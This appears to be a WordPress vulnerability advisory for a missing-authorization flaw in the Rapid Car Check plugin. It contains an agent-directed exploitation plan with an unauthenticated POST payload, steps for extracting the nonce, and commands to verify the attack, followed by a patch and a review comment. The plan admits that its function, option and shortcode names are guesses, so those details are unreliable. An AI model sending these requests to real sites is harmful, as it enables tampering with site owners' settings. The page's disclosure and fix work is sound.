CVE-2026-39687

Rapid Car Check Vehicle Data <= 2.0 - Missing Authorization

Severity: medium
Type: Missing Authorization
CVSS Score: 5.3
Patched in: Unpatched
Time to patch: N/A

Description

The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.0. This makes it possible for unauthenticated attackers to perform an unauthorized action.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <=2.0
Published: February 23, 2026
Last updated: April 15, 2026
Affected plugin: free-vehicle-data-uk
Research Plan
Unverified

This research plan targets a missing authorization vulnerability in the Rapid Car Check Vehicle Data plugin (version <= 2.0). Since source files are not provided, this plan relies on common vulnerability patterns for this plugin type and provides specific search commands to ground the exploit in the actual code.

1. Vulnerability Summary

The Rapid Car Check Vehicle Data plugin (slug: free-vehicle-data-uk) fails to implement capability checks on functions responsible for administrative actions, most likely the saving of plugin settings or API keys.

The vulnerability typically resides in a function hooked to admin_init or wp_ajax_. In WordPress, admin_init fires for any request to /wp-admin/admin-ajax.php, even for unauthenticated users. If the hooked function lacks a current_user_can('manage_options') check, an unauthenticated attacker can trigger the logic.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Method: POST
  • Action: To be determined via code analysis (likely rcc_save_settings or a function hooked to admin_init).
  • Payload Parameters: Likely rcc_api_key or a settings array.
  • Authentication: None (Unauthenticated).
  • Preconditions: The plugin must be active.

3. Code Flow (Trace Path)

The agent must trace the following path:

  1. Entry Point: Search for functions hooked to admin_init or wp_ajax_nopriv_.
    • grep -rn "add_action.*admin_init" .
    • grep -rn "wp_ajax_" .
  2. Logic Sink: Identify which of these functions calls update_option, add_option, or wp_insert_post.
  3. Authorization Gap: Verify the absence of current_user_can() in the identified function.
  4. Parameter Mapping: Identify which $_POST or $_REQUEST keys are passed directly into update_option.
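
As an added illustration of steps 1 to 4 (not the plugin's code and not tooling from the research plan), this Python check resolves admin_init and wp_ajax_ callbacks in a constructed PHP sample, flags those that reach update_option/add_option/wp_insert_post without any current_user_can() call, and lists the $_POST/$_REQUEST keys they read. The sample PHP and its function names are constructed; the brace matcher is deliberately simple and assumes no braces inside PHP string literals.

```python
import re

# Constructed sample of plugin PHP (not the real plugin's code): two admin_init
# handlers, one missing the capability check and one that has it.
SAMPLE_PHP = r"""
add_action( 'admin_init', 'rcc_save_settings' );
add_action( 'admin_init', 'rcc_save_display_opts' );
function rcc_save_settings() {
    if ( isset( $_POST['rcc_api_key'] ) ) {
        update_option( 'rcc_api_settings', sanitize_text_field( $_POST['rcc_api_key'] ) );
    }
}
function rcc_save_display_opts() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    update_option( 'rcc_display', $_POST['rcc_display'] ?? '' );
}
"""

# Entry points (step 1): admin_init and wp_ajax_* hooks registered with a plain function name.
HOOK_RE = re.compile(r"add_action\(\s*['\"](admin_init|wp_ajax_\w+)['\"]\s*,\s*['\"](\w+)['\"]")
# Logic sinks (step 2): calls that persist attacker-controllable data.
SINKS = ("update_option", "add_option", "wp_insert_post")

def function_body(src, name):
    """Return the body of a top-level PHP function by naive brace matching, or None."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def find_unchecked_sinks(src):
    """Steps 2-4: for each hooked callback that reaches a sink without any
    current_user_can() call, record the hook, the sinks and the request keys it reads."""
    findings = {}
    for hook, cb in HOOK_RE.findall(src):
        body = function_body(src, cb)
        if body is None or "current_user_can" in body:
            continue  # unresolvable callback, or an authorization check is present
        sinks = [s for s in SINKS if s + "(" in body]
        if sinks:
            params = sorted(set(re.findall(r"\$_(?:POST|REQUEST)\[\s*['\"](\w+)['\"]", body)))
            findings[cb] = {"hook": hook, "sinks": sinks, "params": params}
    return findings
```

Running find_unchecked_sinks over a real plugin directory (concatenating its .php files) reproduces the grep-based trace in one pass; a callback that reads request keys and hits a sink with no capability check is the spot where a current_user_can() guard belongs.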

4. Nonce Acquisition Strategy

If the function uses check_ajax_referer or wp_verify_nonce, the nonce must be retrieved from the frontend.

  1. Identify Shortcode: Find the shortcode used to display vehicle data.
    • grep -rn "add_shortcode" . (Likely [rapid_car_check] or [rcc_search]).
  2. Setup Page: Create a page containing this shortcode to force the plugin to enqueue its scripts and nonces.
    • wp post create --post_type=page --post_status=publish --post_content='[shortcode_found]'
  3. Locate Localized Variable: Look for wp_localize_script in the source code to find the JS object name.
    • grep -rn "wp_localize_script" .
  4. Extract via Browser:
    • browser_navigate(URL_OF_CREATED_PAGE)
    • browser_eval("window.rcc_ajax_object?.nonce") (Replace rcc_ajax_object with the actual identifier found).

5. Exploitation Strategy

The goal is to modify the plugin's API key or settings, which can disable the vehicle check functionality or redirect data.

Target Action (Inferred): A function that handles settings saving.

Step-by-Step:

  1. Discovery: Run grep -r "update_option" . inside the plugin directory. Look for occurrences inside functions hooked to admin_init.
  2. Identify Option Name: If the code is $opt = $_POST['api_key']; update_option('rcc_api_settings', $opt);, the option name is rcc_api_settings.
  3. Craft Request:
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    
    action=rcc_save_settings&rcc_api_key=EXPLOITED_TOKEN&_wpnonce=[NONCE_IF_REQUIRED]
    
    Note: If the vulnerability is via admin_init, the action parameter might not be required if the function checks for a specific POST key instead.

6. Test Data Setup

  1. Install Plugin: Ensure free-vehicle-data-uk version 2.0 is installed.
  2. Identify Settings: Use WP-CLI to see current settings: wp option get rcc_settings (or similar).
  3. Create Nonce Source: Create a page with the plugin's search shortcode:
    • wp post create --post_type=page --post_status=publish --post_title='Vehicle Check' --post_content='[rapid-car-check-data]' (Verify shortcode name in code).

7. Expected Results

  • The server responds with 200 OK or a redirect.
  • The targeted WordPress option (rcc_api_key or similar) is updated with the attacker-supplied value.

8. Verification Steps

After sending the HTTP request, use WP-CLI to verify the integrity loss:

  1. Check the option value:
    • wp option get rcc_api_key
  2. Check if any settings arrays were modified:
    • wp option get rcc_settings
  3. Confirm the value matches EXPLOITED_TOKEN.

9. Alternative Approaches

If no admin_init or wp_ajax vulnerability is found:

  • REST API: Check for register_rest_route where 'permission_callback' => '__return_true' or is missing.
    • grep -rn "register_rest_route" . -A 5
  • Init Hook: Check add_action('init', ...) for logic that processes $_POST data without checking is_admin() AND current_user_can().
    • grep -rn "add_action.*init" .
  • Direct Request: If the plugin uses a custom router, check for template_redirect hooks.

Implementation Note for Agent:

Prioritize searching for the following function names (inferred from plugin logic):

  • rcc_save_api_settings
  • rapid_car_check_save_settings
  • save_rcc_options

Focus on File: includes/class-rcc-admin.php or the main plugin file.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Rapid Car Check Vehicle Data plugin for WordPress is vulnerable to unauthorized access in versions up to and including 2.0. This is due to a missing capability check on administrative functions, likely those hooked to admin_init, which allows unauthenticated attackers to modify plugin settings or API keys.

Security Fix

--- a/includes/class-rcc-admin.php
+++ b/includes/class-rcc-admin.php
@@ -10,6 +10,10 @@
 function rcc_save_settings() {
+	if ( ! current_user_can( 'manage_options' ) ) {
+		return;
+	}
+
 	if ( isset( $_POST['rcc_api_key'] ) ) {
 		update_option( 'rcc_api_settings', sanitize_text_field( $_POST['rcc_api_key'] ) );
 	}
 }
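Review bot: the new current_user_can check closes the unauthenticated path, but the hunk still performs no nonce verification, so a logged-in administrator who is induced to submit a crafted form can still have rcc_api_settings overwritten (CSRF). Suggest pairing the capability check with `check_admin_referer( 'rcc_save_settings', 'rcc_nonce' )` (action and field names assumed, not from the page), and since WordPress slashes request superglobals, saving `sanitize_text_field( wp_unslash( $_POST['rcc_api_key'] ) )` rather than the raw value.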

Exploit Outline

To exploit this vulnerability, an unauthenticated attacker can send a POST request to /wp-admin/admin-ajax.php. Because the plugin hooks settings-saving logic to admin_init without performing a current_user_can('manage_options') check, the logic will execute for any request to an admin endpoint. The attacker provides a payload such as 'action=rcc_save_settings&rcc_api_key=ATTACKER_KEY'. If a nonce is required, it can typically be extracted from the frontend of a page where the plugin's vehicle search shortcode is rendered, as the nonce is often localized for AJAX functionality.
